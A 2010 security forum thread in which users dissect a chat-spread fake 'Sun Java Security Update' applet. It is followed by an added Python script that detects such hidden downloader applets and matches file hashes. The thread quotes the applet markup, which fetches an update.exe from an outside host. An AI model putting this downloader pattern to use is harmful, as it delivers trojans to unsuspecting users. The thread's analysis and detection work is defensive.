
Another Java security question. 'Publisher' field.


Eagle Creek
November 21st, 2010, 10:10 AM
Hi.

About a week ago I received a chat message from an acquaintance of mine. His chat window also contained a link, which I clicked.

It brought me to a website which launched a Java applet.
http://www.wilderssecurity.com/attachment.php?attachmentid=223568&stc=1&d=1290352126

--
I didn't run the applet, although I almost did. Apart from the AVG warning (which at first didn't pop up), I noticed the file was coming from a German website. The Publisher, however, is "Sun Java MicroSystems", but it wasn't verified. This is pretty likely to mislead users.

Have any of you seen this before? Or do you know someone who might have clicked it?

http://www.wilderssecurity.com/attachment.php?attachmentid=223569&stc=1&d=1290352194

vtol
November 21st, 2010, 10:26 AM
-burnerclan.bu.funpic.de/intern/admin/cp2/index.html-

After a while you get redirected through JS:

<applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">

<param name='file' value="-http://burnerclan.bu.funpic.de/intern/admin/update.exe-">

</applet>



m00nbl00d
November 21st, 2010, 11:07 AM
LinkScanner does flag it: http://linkscanner.explabs.com/linkscanner/checksite.aspx?NS=ChkOnly&SRC=apps.explabs.com&CS=burnerclan.bu.funpic.de/intern/admin/cp2/index.html

Results by URLVoid: http://www.urlvoid.com/scan/burnerclan.bu.funpic.de

My WOT and TrendMicro Web Reputation flag it.

m00nbl00d
November 21st, 2010, 11:10 AM
-{ Quote: "Hi.

[...]Except for the AVG warning (which at first didn't pop up),[...]" }-

That could be because LinkScanner won't actually scan domain and sub-domains at the same time; it only scans the page you're on, which is why when you got redirected to the index.html page it blocked it.

m00nbl00d
November 21st, 2010, 11:14 AM
-{ Quote: "[...]
<applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">

<param name='file' value="-http://burnerclan.bu.funpic.de/intern/admin/update.exe-">
[...]" }-

I bet Eagle Creek's LinkScanner is going crazy right now, due to this code. Most likely it is blocking his access to the full thread. :D

vtol
November 21st, 2010, 11:20 AM
This may have been an attempt to run code, but it fails as -burnerclan.bu.funpic.de/intern/admin/update.exe- is currently not available at that location.

vtol
November 21st, 2010, 02:14 PM
The JS file got classified:

Sun_Microsystems_Java_Security_Update_6.class - probably a variant of Win32/TrojanDownloader.Agent.ESKWMEL trojan

MD5 : 3d76ae89d24ece60549f3f7b57ffbc63
SHA1 : c887bd78e3eaed6ec8a47d96abada8ffc70b8374
SHA256: ee9a15dada830f914580e8aaa0ea6191bc63773f53a174774b99a4f816f12c77
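The applet vtol quoted earlier is the whole downloader in two lines: a 1x1 (invisible) applet whose class name imitates a Sun/Java update, with a `file` parameter pointing at an `.exe`, and the hashes above are the only other indicator the thread gives. The following is an added example, not code from the thread or from any of the posters, of how a practitioner might triage a page for that pattern and check a retrieved payload against the posted hashes. The sample HTML is constructed for the example (the domain is replaced with `example.invalid`), and the heuristics (hidden-size threshold, executable extensions, vendor-lookalike keywords) are the author's own assumptions, not anything the thread specifies.

```python
"""Added example: triage an HTML page for hidden Java applet downloaders
and match a downloaded file against the hashes posted in the thread."""
import hashlib
from html.parser import HTMLParser

# Hashes vtol posted for Sun_Microsystems_Java_Security_Update_6.class.
IOC_HASHES = {
    "md5": "3d76ae89d24ece60549f3f7b57ffbc63",
    "sha1": "c887bd78e3eaed6ec8a47d96abada8ffc70b8374",
    "sha256": "ee9a15dada830f914580e8aaa0ea6191bc63773f53a174774b99a4f816f12c77",
}

# Constructed sample page: the first applet mirrors the structure vtol quoted
# (domain replaced), the second is a benign-looking applet for contrast.
SAMPLE_HTML = """
<html><body>
<applet code="Sun_Microsystems_Java_Security_Update_6.class"
        archive="Sun_Microsystems_Java_Security_Update_6.jar" width="1" height="1">
  <param name="file" value="http://example.invalid/intern/admin/update.exe">
</applet>
<applet code="Clock.class" archive="clock.jar" width="200" height="100">
  <param name="tz" value="UTC">
</applet>
</body></html>
"""

# Assumed heuristics (not from the thread).
EXECUTABLE_EXT = (".exe", ".scr", ".dll", ".bat", ".com", ".pif")
LOOKALIKE_WORDS = ("sun_microsystems", "java_security_update", "security_update", "oracle")


class AppletScanner(HTMLParser):
    """Collect every <applet> with its attributes and nested <param> tags."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "applet":
            self._cur = {"code": a.get("code"), "archive": a.get("archive"),
                         "width": a.get("width"), "height": a.get("height"),
                         "params": {}}
        elif tag == "param" and self._cur is not None:
            self._cur["params"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet" and self._cur is not None:
            self.applets.append(self._cur)
            self._cur = None


def _dim(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def score_applet(applet):
    """Return a list of human-readable reasons the applet looks like a downloader."""
    reasons = []
    w, h = _dim(applet["width"]), _dim(applet["height"])
    if w is not None and h is not None and w * h <= 4:
        reasons.append("hidden applet (%dx%d): nothing to show the user" % (w, h))
    for name, value in applet["params"].items():
        if value.lower().strip().endswith(EXECUTABLE_EXT):
            reasons.append("param %r points at an executable: %s" % (name, value))
    names = " ".join(filter(None, [applet["code"], applet["archive"]])).lower()
    if any(word in names for word in LOOKALIKE_WORDS):
        reasons.append("vendor-lookalike class/archive name: %s" % names)
    return reasons


def scan_html(html):
    """Return [(applet code attribute, reasons)] for every applet in the page."""
    parser = AppletScanner()
    parser.feed(html)
    parser.close()
    return [(a["code"], score_applet(a)) for a in parser.applets]


def match_ioc(data):
    """Return the algorithm name whose posted hash matches `data`, else None."""
    for algo, expected in IOC_HASHES.items():
        if hashlib.new(algo, data).hexdigest() == expected:
            return algo
    return None


if __name__ == "__main__":
    for code, reasons in scan_html(SAMPLE_HTML):
        print(code, "->", reasons or "nothing suspicious")
    print("IOC match for a random blob:", match_ioc(b"not the sample"))
```

Note that `match_ioc` only tells you the file is the exact sample vtol submitted; the same downloader recompiled with a different class name or string will not match, which is why the structural heuristics in `score_applet` matter more than the hashes for triage.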